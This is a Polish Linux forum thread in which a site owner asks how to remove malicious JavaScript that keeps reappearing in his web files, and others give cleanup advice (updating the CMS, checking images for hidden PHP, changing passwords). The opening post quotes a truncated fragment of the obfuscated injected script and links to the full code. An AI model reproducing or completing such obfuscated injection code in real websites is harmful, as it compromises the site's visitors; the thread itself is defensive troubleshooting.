Jak si

Tematy związane z oprogramowaniem, instalacją, konfiguracją
zaba141
Posty: 12
Rejestracja: 18 października 2011, 10:02

Jak się pozbyć wirususa na Debianie?

Post autor: zaba141 »

Witam.
Panie i
panowie mam problem, do kodu strony dodaję mi się wirus. Program clamav nie znajduje nic, a wirus po skasowaniu wraca. Na następny dzień wkrada się do kodu .html, .js .tpl, .php i plików

Poniżej fragment kodu tego wirusa.

Kod: Zaznacz cały

p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!
piroaa
Beginner
Posty: 324
Rejestracja: 11 kwietnia 2008, 14:46

Post autor: piroaa »

Dzień dobry.
Jeśli możesz podeślij całość brat kolekcjonuje takie kwiatki.
Co do pozbycia się wywalić to z wszystkich plików na serwerze, przejrzy też obrazki w nich mogą być panele do zarządzania twoim serwerem :D
Jak zawartość serwera będzie czysta zmień hasło dostępu i nie zapisuj w żadnych filezillach czy innych menadżerach ftp jak łączysz się z windowsa możesz mieć keylogera dla tego nie łącz się z niepewnego windowsa.
Pozdrawiam.
Awatar użytkownika
lessmian2
Member
Posty: 1088
Rejestracja: 30 kwietnia 2008, 19:38
Lokalizacja: Kraków

Post autor: lessmian2 »

Jeśli jest to jeden z popularnych CMSów, to przede wszystkim zaktualizuj go do najnowszej dostępnej wersji. Najczęstszą przyczyną włamań jest nieaktualne oprogramowanie. Możesz też wyszukać wszystkie pliki których typ nie pasuje do rozszerzenia (polecenie file, np. skrypt php w pliku foo.gif ;) Jeśli coś znajdziesz - usuń.

Jeśli sam napisałeś stronę, to pewnie gdzieś masz dziurę ;)
zaba141
Posty: 12
Rejestracja: 18 października 2011, 10:02

Post autor: zaba141 »

http://pastebin.com/wWRMV3MN tu macie pełny kod tego wirusa.
ODPOWIEDZ